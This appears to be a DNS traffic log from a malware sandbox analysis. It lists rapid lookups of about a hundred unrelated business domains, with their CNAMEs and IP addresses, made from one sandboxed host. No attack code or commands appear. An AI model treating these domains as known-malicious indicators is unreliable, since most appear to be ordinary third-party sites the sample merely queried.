                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.573904991 CET8.8.8.8192.168.2.50xcd51No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.573904991 CET8.8.8.8192.168.2.50xcd51No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.590939045 CET8.8.8.8192.168.2.50xd7acNo error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.771644115 CET8.8.8.8192.168.2.50xd09cNo error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.771644115 CET8.8.8.8192.168.2.50xd09cNo error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.780380964 CET8.8.8.8192.168.2.50x5acaNo error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.780380964 CET8.8.8.8192.168.2.50x5acaNo error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.794641018 CET8.8.8.8192.168.2.50x4871No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.794641018 CET8.8.8.8192.168.2.50x4871No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.306534052 CET8.8.8.8192.168.2.50xc0c9No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.306534052 CET8.8.8.8192.168.2.50xc0c9No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.306534052 CET8.8.8.8192.168.2.50xc0c9No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.306534052 CET8.8.8.8192.168.2.50xc0c9No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.306534052 CET8.8.8.8192.168.2.50xc0c9No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.437808990 CET8.8.8.8192.168.2.50x7f66No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.437808990 CET8.8.8.8192.168.2.50x7f66No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.438621044 CET8.8.8.8192.168.2.50x54daNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.438621044 CET8.8.8.8192.168.2.50x54daNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.459712029 CET8.8.8.8192.168.2.50x53acNo error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.459712029 CET8.8.8.8192.168.2.50x53acNo error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.553163052 CET8.8.8.8192.168.2.50xfd77No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.553163052 CET8.8.8.8192.168.2.50xfd77No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.645107985 CET8.8.8.8192.168.2.50x7aa4No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.647567987 CET8.8.8.8192.168.2.50x2068No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.647567987 CET8.8.8.8192.168.2.50x2068No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.929147959 CET8.8.8.8192.168.2.50x5a2bNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.938915968 CET8.8.8.8192.168.2.50x441dName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.038614035 CET8.8.8.8192.168.2.50x337bNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.156832933 CET8.8.8.8192.168.2.50xc84dNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.576982021 CET8.8.8.8192.168.2.50xbd1bNo error (0)www.netcr.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.576982021 CET8.8.8.8192.168.2.50xbd1bNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.576982021 CET8.8.8.8192.168.2.50xbd1bNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.576982021 CET8.8.8.8192.168.2.50xbd1bNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.593058109 CET8.8.8.8192.168.2.50xcdbcNo error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.619106054 CET8.8.8.8192.168.2.50xd7fNo error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.641283035 CET8.8.8.8192.168.2.50x9a0No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.659317970 CET8.8.8.8192.168.2.50x9a0No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.687017918 CET8.8.8.8192.168.2.50xe2bbNo error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.687017918 CET8.8.8.8192.168.2.50xe2bbNo error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.819154024 CET8.8.8.8192.168.2.50x9d4fNo error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.819154024 CET8.8.8.8192.168.2.50x9d4fNo error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.819154024 CET8.8.8.8192.168.2.50x9d4fNo error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.085280895 CET8.8.8.8192.168.2.50x9787No error (0)www.findbc.com13.248.216.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.085280895 CET8.8.8.8192.168.2.50x9787No error (0)www.findbc.com76.223.65.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.163790941 CET8.8.8.8192.168.2.50x5aa5No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.259613991 CET8.8.8.8192.168.2.50x2cc5Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.515909910 CET8.8.8.8192.168.2.50x86c2No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.515909910 CET8.8.8.8192.168.2.50x86c2No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.699861050 CET8.8.8.8192.168.2.50x51adNo error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.759386063 CET8.8.8.8192.168.2.50x810No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.861632109 CET8.8.8.8192.168.2.50xd1a1No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.861632109 CET8.8.8.8192.168.2.50xd1a1No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.861632109 CET8.8.8.8192.168.2.50xd1a1No error (0)d2kt7vovxa5e81.cloudfront.net65.9.95.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.861632109 CET8.8.8.8192.168.2.50xd1a1No error (0)d2kt7vovxa5e81.cloudfront.net65.9.95.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.861632109 CET8.8.8.8192.168.2.50xd1a1No error (0)d2kt7vovxa5e81.cloudfront.net65.9.95.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.861632109 CET8.8.8.8192.168.2.50xd1a1No error (0)d2kt7vovxa5e81.cloudfront.net65.9.95.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.906465054 CET8.8.8.8192.168.2.50x7891No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.906465054 CET8.8.8.8192.168.2.50x7891No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.906465054 CET8.8.8.8192.168.2.50x7891No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.906465054 CET8.8.8.8192.168.2.50x7891No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.906465054 CET8.8.8.8192.168.2.50x7891No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.911308050 CET8.8.8.8192.168.2.50x3c1bNo error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.591291904 CET8.8.8.8192.168.2.50xc917No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.591291904 CET8.8.8.8192.168.2.50xc917No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.591291904 CET8.8.8.8192.168.2.50xc917No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.602807045 CET8.8.8.8192.168.2.50xcb5cNo error (0)www.dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.602807045 CET8.8.8.8192.168.2.50xcb5cNo error (0)www.dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.736424923 CET8.8.8.8192.168.2.50xa590No error (0)www.myropcb.com74.208.215.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.782799959 CET8.8.8.8192.168.2.50xa776No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.782799959 CET8.8.8.8192.168.2.50xa776No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.782799959 CET8.8.8.8192.168.2.50xa776No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.855834961 CET8.8.8.8192.168.2.50x3088No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.892832994 CET8.8.8.8192.168.2.50x4866No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:33.502795935 CET8.8.8.8192.168.2.50x4f9aNo error (0)www.stajum.com103.3.1.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:33.529330015 CET8.8.8.8192.168.2.50xa71fNo error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:33.529330015 CET8.8.8.8192.168.2.50xa71fNo error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:33.562242031 CET8.8.8.8192.168.2.50x8ac1No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:33.867520094 CET8.8.8.8192.168.2.50xe7f3Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:34.331468105 CET8.8.8.8192.168.2.50x23c2No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:34.359767914 CET8.8.8.8192.168.2.50x4fb0No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:35.043931007 CET8.8.8.8192.168.2.50xf65No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:35.747859955 CET8.8.8.8192.168.2.50x6b55No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.875706911 CET8.8.8.8192.168.2.50xaf05No error (0)www.pdqhomes.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.875706911 CET8.8.8.8192.168.2.50xaf05No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.875706911 CET8.8.8.8192.168.2.50xaf05No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.875706911 CET8.8.8.8192.168.2.50xaf05No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.880755901 CET8.8.8.8192.168.2.50x17dfName error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.884666920 CET8.8.8.8192.168.2.50x1cf2No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.884666920 CET8.8.8.8192.168.2.50x1cf2No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.888602018 CET8.8.8.8192.168.2.50xf8e6No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.888602018 CET8.8.8.8192.168.2.50xf8e6No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.897495985 CET8.8.8.8192.168.2.50x830dNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:37.105618954 CET8.8.8.8192.168.2.50x34b2No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:37.116878986 CET8.8.8.8192.168.2.50x1114No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:37.116878986 CET8.8.8.8192.168.2.50x1114No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.619318962 CET8.8.8.8192.168.2.50x6406No error (0)www.railbook.net81.171.22.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.742712021 CET8.8.8.8192.168.2.50x30b0No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.742712021 CET8.8.8.8192.168.2.50x30b0No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.764306068 CET8.8.8.8192.168.2.50x8dd1No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.764306068 CET8.8.8.8192.168.2.50x8dd1No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.770905972 CET8.8.8.8192.168.2.50xdd20Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.024930000 CET8.8.8.8192.168.2.50x6941No error (0)www.rs-ag.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.024930000 CET8.8.8.8192.168.2.50x6941No error (0)www.rs-ag.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.063669920 CET8.8.8.8192.168.2.50xbaf9No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.063669920 CET8.8.8.8192.168.2.50xbaf9No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.063669920 CET8.8.8.8192.168.2.50xbaf9No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.155637026 CET8.8.8.8192.168.2.50xfabaNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.155637026 CET8.8.8.8192.168.2.50xfabaNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.155637026 CET8.8.8.8192.168.2.50xfabaNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.171571970 CET8.8.8.8192.168.2.50x1072No error (0)www.alteor.clgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.171571970 CET8.8.8.8192.168.2.50x1072No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.171571970 CET8.8.8.8192.168.2.50x1072No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.252432108 CET8.8.8.8192.168.2.50x2ad6No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.252432108 CET8.8.8.8192.168.2.50x2ad6No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.252432108 CET8.8.8.8192.168.2.50x2ad6No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.356034994 CET8.8.8.8192.168.2.50x3f2cNo error (0)www.wifi4all.nl188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.356034994 CET8.8.8.8192.168.2.50x3f2cNo error (0)www.wifi4all.nl188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.481003046 CET8.8.8.8192.168.2.50xd31dNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.491451979 CET8.8.8.8192.168.2.50x97b7No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.506637096 CET8.8.8.8192.168.2.50x8ad2No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.506637096 CET8.8.8.8192.168.2.50x8ad2No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.506637096 CET8.8.8.8192.168.2.50x8ad2No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.510951042 CET8.8.8.8192.168.2.50xf310No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.510951042 CET8.8.8.8192.168.2.50xf310No error (0)ghs.googlehosted.com142.250.186.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.527045012 CET8.8.8.8192.168.2.50x5613No error (0)www.fcwcvt.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.527045012 CET8.8.8.8192.168.2.50x5613No error (0)www.fcwcvt.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.549449921 CET8.8.8.8192.168.2.50xa969No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.549449921 CET8.8.8.8192.168.2.50xa969No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.549449921 CET8.8.8.8192.168.2.50xa969No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.766009092 CET8.8.8.8192.168.2.50x410No error (0)www.petsfan.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.766009092 CET8.8.8.8192.168.2.50x410No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.766009092 CET8.8.8.8192.168.2.50x410No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.766009092 CET8.8.8.8192.168.2.50x410No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.955027103 CET8.8.8.8192.168.2.50x17aNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.955027103 CET8.8.8.8192.168.2.50x17aNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.955027103 CET8.8.8.8192.168.2.50x17aNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.956830978 CET8.8.8.8192.168.2.50x348eName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.963823080 CET8.8.8.8192.168.2.50x74fbNo error (0)www.otena.com99.83.154.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.966190100 CET8.8.8.8192.168.2.50xbb5bNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.966190100 CET8.8.8.8192.168.2.50xbb5bNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.040213108 CET8.8.8.8192.168.2.50x52c2No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.040213108 CET8.8.8.8192.168.2.50x52c2No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.152714968 CET8.8.8.8192.168.2.50x8010No error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.152714968 CET8.8.8.8192.168.2.50x8010No error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.480382919 CET8.8.8.8192.168.2.50x6fbbNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.631423950 CET8.8.8.8192.168.2.50x663bNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.631423950 CET8.8.8.8192.168.2.50x663bNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.637356997 CET8.8.8.8192.168.2.50x28b5No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
